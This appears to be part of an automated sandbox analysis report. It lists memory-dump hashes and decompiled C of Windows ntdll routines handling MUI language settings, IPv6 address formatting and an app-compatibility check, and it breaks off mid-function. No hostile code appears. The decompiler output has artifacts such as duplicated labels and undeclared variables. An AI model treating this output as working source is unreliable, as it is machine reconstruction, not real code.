                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                        • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                        • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                        • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                        • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                        • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                        • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                        • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                        • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                        • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp

                                                                                        C-Code - Quality: 94%
                                                                                        			E00A98788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                        				signed int _v8;
                                                                                        				short* _v12;
                                                                                        				void* _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				char _v36;
                                                                                        				signed int _v40;
                                                                                        				char _v44;
                                                                                        				signed int _v48;
                                                                                        				signed int _v52;
                                                                                        				signed int _v56;
                                                                                        				signed int _v60;
                                                                                        				char _v68;
                                                                                        				void* _t216;
                                                                                        				intOrPtr _t231;
                                                                                        				short* _t235;
                                                                                        				intOrPtr _t257;
                                                                                        				short* _t261;
                                                                                        				intOrPtr _t284;
                                                                                        				intOrPtr _t288;
                                                                                        				void* _t314;
                                                                                        				signed int _t318;
                                                                                        				short* _t319;
                                                                                        				intOrPtr _t321;
                                                                                        				void* _t328;
                                                                                        				void* _t329;
                                                                                        				char* _t332;
                                                                                        				signed int _t333;
                                                                                        				signed int* _t334;
                                                                                        				void* _t335;
                                                                                        				void* _t338;
                                                                                        				void* _t339;
                                                                                        
                                                                                        				_t328 = __edx;
                                                                                        				_t322 = __ecx;
                                                                                        				_t318 = 0;
                                                                                        				_t334 = _a4;
                                                                                        				_v8 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v48 = 0;
                                                                                        				_v20 = 0;
                                                                                        				_v40 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v52 = 0;
                                                                                        				if(_t334 == 0) {
                                                                                        					_t329 = 0xc000000d;
                                                                                        					L49:
                                                                                        					_t334[0x11] = _v56;
                                                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                                                        					_t334[0x12] = _v60;
                                                                                        					_t334[0x13] = _v28;
                                                                                        					_t334[0x17] = _v20;
                                                                                        					_t334[0x16] = _v48;
                                                                                        					_t334[0x18] = _v40;
                                                                                        					_t334[0x14] = _v32;
                                                                                        					_t334[0x15] = _v52;
                                                                                        					return _t329;
                                                                                        				}
                                                                                        				_v56 = 0;
                                                                                        				if(E00A98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                        					_v56 = 1;
                                                                                        					if(_v8 != 0) {
                                                                                        						_t207 = E00A7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                        					}
                                                                                        					_push(1);
                                                                                        					_v8 = _t318;
                                                                                        					E00A9718A(_t207);
                                                                                        					_t335 = _t335 + 4;
                                                                                        				}
                                                                                        				_v60 = _v60 | 0xffffffff;
                                                                                        				if(E00A98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                        					_t333 =  *_v8;
                                                                                        					_v60 = _t333;
                                                                                        					_t314 = E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        					_push(_t333);
                                                                                        					_v8 = _t318;
                                                                                        					E00A9718A(_t314);
                                                                                        					_t335 = _t335 + 4;
                                                                                        				}
                                                                                        				_t216 = E00A98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                        				_t332 = ";";
                                                                                        				if(_t216 < 0) {
                                                                                        					L17:
                                                                                        					if(E00A98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                        						L30:
                                                                                        						if(E00A98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                        							L46:
                                                                                        							_t329 = 0;
                                                                                        							L47:
                                                                                        							if(_v8 != _t318) {
                                                                                        								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        							}
                                                                                        							if(_v28 != _t318) {
                                                                                        								if(_v20 != _t318) {
                                                                                        									E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                        									_v20 = _t318;
                                                                                        									_v40 = _t318;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L49;
                                                                                        						}
                                                                                        						_t231 = _v24;
                                                                                        						_t322 = _t231 + 4;
                                                                                        						_push(_t231);
                                                                                        						_v52 = _t322;
                                                                                        						E00A9718A(_t231);
                                                                                        						if(_t322 == _t318) {
                                                                                        							_v32 = _t318;
                                                                                        						} else {
                                                                                        							_v32 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        						}
                                                                                        						if(_v32 == _t318) {
                                                                                        							_v52 = _t318;
                                                                                        							L58:
                                                                                        							_t329 = 0xc0000017;
                                                                                        							goto L47;
                                                                                        						} else {
                                                                                        							E00A72340(_v32, _v8, _v24);
                                                                                        							_v16 = _v32;
                                                                                        							_a4 = _t318;
                                                                                        							_t235 = E00A8E679(_v32, _t332);
                                                                                        							while(1) {
                                                                                        								_t319 = _t235;
                                                                                        								if(_t319 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								 *_t319 = 0;
                                                                                        								_t321 = _t319 + 2;
                                                                                        								E00A7E2A8(_t322,  &_v68, _v16);
                                                                                        								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        									_a4 = _a4 + 1;
                                                                                        								}
                                                                                        								_v16 = _t321;
                                                                                        								_t235 = E00A8E679(_t321, _t332);
                                                                                        								_pop(_t322);
                                                                                        							}
                                                                                        							_t236 = _v16;
                                                                                        							if( *_v16 != _t319) {
                                                                                        								E00A7E2A8(_t322,  &_v68, _t236);
                                                                                        								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        									_a4 = _a4 + 1;
                                                                                        								}
                                                                                        							}
                                                                                        							if(_a4 == 0) {
                                                                                        								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                        								_v52 = _v52 & 0x00000000;
                                                                                        								_v32 = _v32 & 0x00000000;
                                                                                        							}
                                                                                        							if(_v8 != 0) {
                                                                                        								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                        							}
                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                        							_t318 = 0;
                                                                                        							goto L46;
                                                                                        						}
                                                                                        					}
                                                                                        					_t257 = _v24;
                                                                                        					_t322 = _t257 + 4;
                                                                                        					_push(_t257);
                                                                                        					_v40 = _t322;
                                                                                        					E00A9718A(_t257);
                                                                                        					_t338 = _t335 + 4;
                                                                                        					if(_t322 == _t318) {
                                                                                        						_v20 = _t318;
                                                                                        					} else {
                                                                                        						_v20 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        					}
                                                                                        					if(_v20 == _t318) {
                                                                                        						_v40 = _t318;
                                                                                        						goto L58;
                                                                                        					} else {
                                                                                        						E00A72340(_v20, _v8, _v24);
                                                                                        						_v16 = _v20;
                                                                                        						_a4 = _t318;
                                                                                        						_t261 = E00A8E679(_v20, _t332);
                                                                                        						_t335 = _t338 + 0x14;
                                                                                        						while(1) {
                                                                                        							_v12 = _t261;
                                                                                        							if(_t261 == _t318) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_v12 = _v12 + 2;
                                                                                        							 *_v12 = 0;
                                                                                        							E00A7E2A8(_v12,  &_v68, _v16);
                                                                                        							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        								_a4 = _a4 + 1;
                                                                                        							}
                                                                                        							_v16 = _v12;
                                                                                        							_t261 = E00A8E679(_v12, _t332);
                                                                                        							_pop(_t322);
                                                                                        						}
                                                                                        						_t269 = _v16;
                                                                                        						if( *_v16 != _t318) {
                                                                                        							E00A7E2A8(_t322,  &_v68, _t269);
                                                                                        							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        								_a4 = _a4 + 1;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_a4 == _t318) {
                                                                                        							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                        							_v40 = _t318;
                                                                                        							_v20 = _t318;
                                                                                        						}
                                                                                        						if(_v8 != _t318) {
                                                                                        							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        						}
                                                                                        						_v8 = _t318;
                                                                                        						goto L30;
                                                                                        					}
                                                                                        				}
                                                                                        				_t284 = _v24;
                                                                                        				_t322 = _t284 + 4;
                                                                                        				_push(_t284);
                                                                                        				_v48 = _t322;
                                                                                        				E00A9718A(_t284);
                                                                                        				_t339 = _t335 + 4;
                                                                                        				if(_t322 == _t318) {
                                                                                        					_v28 = _t318;
                                                                                        				} else {
                                                                                        					_v28 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        				}
                                                                                        				if(_v28 == _t318) {
                                                                                        					_v48 = _t318;
                                                                                        					goto L58;
                                                                                        				} else {
                                                                                        					E00A72340(_v28, _v8, _v24);
                                                                                        					_v16 = _v28;
                                                                                        					_a4 = _t318;
                                                                                        					_t288 = E00A8E679(_v28, _t332);
                                                                                        					_t335 = _t339 + 0x14;
                                                                                        					while(1) {
                                                                                        						_v12 = _t288;
                                                                                        						if(_t288 == _t318) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_v12 = _v12 + 2;
                                                                                        						 *_v12 = 0;
                                                                                        						E00A7E2A8(_v12,  &_v68, _v16);
                                                                                        						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        							_a4 = _a4 + 1;
                                                                                        						}
                                                                                        						_v16 = _v12;
                                                                                        						_t288 = E00A8E679(_v12, _t332);
                                                                                        						_pop(_t322);
                                                                                        					}
                                                                                        					_t296 = _v16;
                                                                                        					if( *_v16 != _t318) {
                                                                                        						E00A7E2A8(_t322,  &_v68, _t296);
                                                                                        						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        							_a4 = _a4 + 1;
                                                                                        						}
                                                                                        					}
                                                                                        					if(_a4 == _t318) {
                                                                                        						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                        						_v48 = _t318;
                                                                                        						_v28 = _t318;
                                                                                        					}
                                                                                        					if(_v8 != _t318) {
                                                                                        						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        					}
                                                                                        					_v8 = _t318;
                                                                                        					goto L17;
                                                                                        				}
                                                                                        			}





































                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ae1b21
                                                                                        0x00ae1b27
                                                                                        0x00ae1b2e
                                                                                        0x00ae1b42
                                                                                        0x00ae1b44
                                                                                        0x00ae1b44
                                                                                        0x00ae1b4c
                                                                                        0x00ae1b4f
                                                                                        0x00ae1b55
                                                                                        0x00ae1b55
                                                                                        0x00a988a4
                                                                                        0x00a988aa
                                                                                        0x00a988b1
                                                                                        0x00a988c5
                                                                                        0x00ae1b5b
                                                                                        0x00ae1b5b
                                                                                        0x00a988c5
                                                                                        0x00a988ce
                                                                                        0x00a988e0
                                                                                        0x00a988e5
                                                                                        0x00a988e8
                                                                                        0x00a988e8
                                                                                        0x00a988ee
                                                                                        0x00a98900
                                                                                        0x00a98900
                                                                                        0x00a98905
                                                                                        0x00000000
                                                                                        0x00a98905

                                                                                        APIs
                                                                                        Strings
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                                                        • WindowsExcludedProcs, xrefs: 00A987C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: _wcspbrk
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 402402107-258546922
                                                                                        • Opcode ID: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                                                        • Instruction ID: cc9c08e51eaef2e9edfab93a9b0e80f7bf7f0d6c999efbb6c97ac7f7e2a2df57
                                                                                        • Opcode Fuzzy Hash: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                                                        • Instruction Fuzzy Hash: FBF1D6B2E00249EFCF11EF95CA819EEB7F9FF09300F15846AE505A7211EB359A45DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 38%
                                                                                        			E00AB13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                        				char _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr* _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v24;
                                                                                        				intOrPtr _t71;
                                                                                        				signed int _t78;
                                                                                        				signed int _t86;
                                                                                        				char _t90;
                                                                                        				signed int _t91;
                                                                                        				signed int _t96;
                                                                                        				intOrPtr _t108;
                                                                                        				signed int _t114;
                                                                                        				void* _t115;
                                                                                        				intOrPtr _t128;
                                                                                        				intOrPtr* _t129;
                                                                                        				void* _t130;
                                                                                        
                                                                                        				_t129 = _a4;
                                                                                        				_t128 = _a8;
                                                                                        				_t116 = 0;
                                                                                        				_t71 = _t128 + 0x5c;
                                                                                        				_v8 = 8;
                                                                                        				_v20 = _t71;
                                                                                        				if( *_t129 == 0) {
                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                        						goto L5;
                                                                                        					} else {
                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                        						if(_t96 != 0) {
                                                                                        							L38:
                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                        								goto L5;
                                                                                        							} else {
                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        								_t86 = E00AA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                        								L36:
                                                                                        								return _t128 + _t86 * 2;
                                                                                        							}
                                                                                        						}
                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                        						if(_t114 == 0) {
                                                                                        							L33:
                                                                                        							_t115 = 0xa72926;
                                                                                        							L35:
                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                        							_t86 = E00AA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						if(_t114 != 0xffff) {
                                                                                        							_t116 = 0;
                                                                                        							goto L38;
                                                                                        						}
                                                                                        						if(_t114 != 0) {
                                                                                        							_t115 = 0xa79cac;
                                                                                        							goto L35;
                                                                                        						}
                                                                                        						goto L33;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L5:
                                                                                        					_a8 = _t116;
                                                                                        					_a4 = _t116;
                                                                                        					_v12 = _t116;
                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                        							_v8 = 6;
                                                                                        						}
                                                                                        					}
                                                                                        					_t90 = _v8;
                                                                                        					if(_t90 <= _t116) {
                                                                                        						L11:
                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                        							_a8 = _t116;
                                                                                        							_a4 = _t116;
                                                                                        						}
                                                                                        						_t91 = 0;
                                                                                        						if(_v8 <= _t116) {
                                                                                        							L22:
                                                                                        							if(_v8 < 8) {
                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        								_t128 = _t128 + E00AA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                        							}
                                                                                        							return _t128;
                                                                                        						} else {
                                                                                        							L14:
                                                                                        							L14:
                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                        									_push(":");
                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                        									_push(_t128);
                                                                                        									_t128 = _t128 + E00AA7707() * 2;
                                                                                        									_t71 = _v20;
                                                                                        									_t130 = _t130 + 0xc;
                                                                                        								}
                                                                                        								_t78 = E00AA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                        								_t130 = _t130 + 0x10;
                                                                                        							} else {
                                                                                        								_push(L"::");
                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                        								_push(_t128);
                                                                                        								_t78 = E00AA7707();
                                                                                        								_t130 = _t130 + 0xc;
                                                                                        								_t91 = _a8 - 1;
                                                                                        							}
                                                                                        							_t91 = _t91 + 1;
                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                        							_t71 = _v20;
                                                                                        							if(_t91 >= _v8) {
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							_t116 = 0;
                                                                                        							goto L14;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t108 = 1;
                                                                                        						_v16 = _t129;
                                                                                        						_v24 = _t90;
                                                                                        						do {
                                                                                        							if( *_v16 == _t116) {
                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                        									_a4 = _v12;
                                                                                        									_a8 = _t108;
                                                                                        								}
                                                                                        								_t116 = 0;
                                                                                        							} else {
                                                                                        								_v12 = _t108;
                                                                                        							}
                                                                                        							_v16 = _v16 + 2;
                                                                                        							_t108 = _t108 + 1;
                                                                                        							_t26 =  &_v24;
                                                                                        							 *_t26 = _v24 - 1;
                                                                                        						} while ( *_t26 != 0);
                                                                                        						goto L11;
                                                                                        					}
                                                                                        				}
                                                                                        			}




















                                                                                        0x00ab138e
                                                                                        0x00ab1390
                                                                                        0x00ab1397
                                                                                        0x00ab1398
                                                                                        0x00ab1399
                                                                                        0x00ab13a1
                                                                                        0x00ab13a4
                                                                                        0x00ab13a4
                                                                                        0x00ab1498
                                                                                        0x00ab149c
                                                                                        0x00ab149f
                                                                                        0x00ab14a2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ab14a4
                                                                                        0x00000000
                                                                                        0x00ab14a4
                                                                                        0x00ab1413
                                                                                        0x00ab1415
                                                                                        0x00ab1416
                                                                                        0x00ab1419
                                                                                        0x00ab141c
                                                                                        0x00ab1422
                                                                                        0x00ab13b7
                                                                                        0x00ab13bc
                                                                                        0x00ab13bf
                                                                                        0x00ab13bf
                                                                                        0x00ab13c2
                                                                                        0x00ab1424
                                                                                        0x00ab1424
                                                                                        0x00ab1424
                                                                                        0x00ab1427
                                                                                        0x00ab142b
                                                                                        0x00ab142c
                                                                                        0x00ab142c
                                                                                        0x00ab142c
                                                                                        0x00000000
                                                                                        0x00ab141c
                                                                                        0x00ab1411

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                                                        • Instruction ID: 73cc18af1fa9017f7925262be259ede0acc4c2233492ba7f3f330d7c579eb102
                                                                                        • Opcode Fuzzy Hash: 882142cc10b0346c19977111778dc3e0c4869c6ff84747264cd06173e5170f4d
                                                                                        • Instruction Fuzzy Hash: 4F613BB1900655AACB34DF59C8A08FFBBF9EF94300754C42EF4DA4B642E3349A40DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E00AA7EFD(void* __ecx, intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				char _v540;
                                                                                        				unsigned int _v544;
                                                                                        				signed int _v548;
                                                                                        				intOrPtr _v552;
                                                                                        				char _v556;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t33;
                                                                                        				void* _t38;
                                                                                        				unsigned int _t46;
                                                                                        				unsigned int _t47;
                                                                                        				unsigned int _t52;
                                                                                        				intOrPtr _t56;
                                                                                        				unsigned int _t62;
                                                                                        				void* _t69;
                                                                                        				void* _t70;
                                                                                        				intOrPtr _t72;
                                                                                        				signed int _t73;
                                                                                        				void* _t74;
                                                                                        				void* _t75;
                                                                                        				void* _t76;
                                                                                        				void* _t77;
                                                                                        
                                                                                        				_t33 =  *0xb52088; // 0x77499e17
                                                                                        				_v8 = _t33 ^ _t73;
                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                        				_t72 = _a4;
                                                                                        				if(E00AA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                        					__eflags = _v548;
                                                                                        					if(_v548 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_t62 = _t72 + 0x24;
                                                                                        					E00AC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                        					_t71 = 0x214;
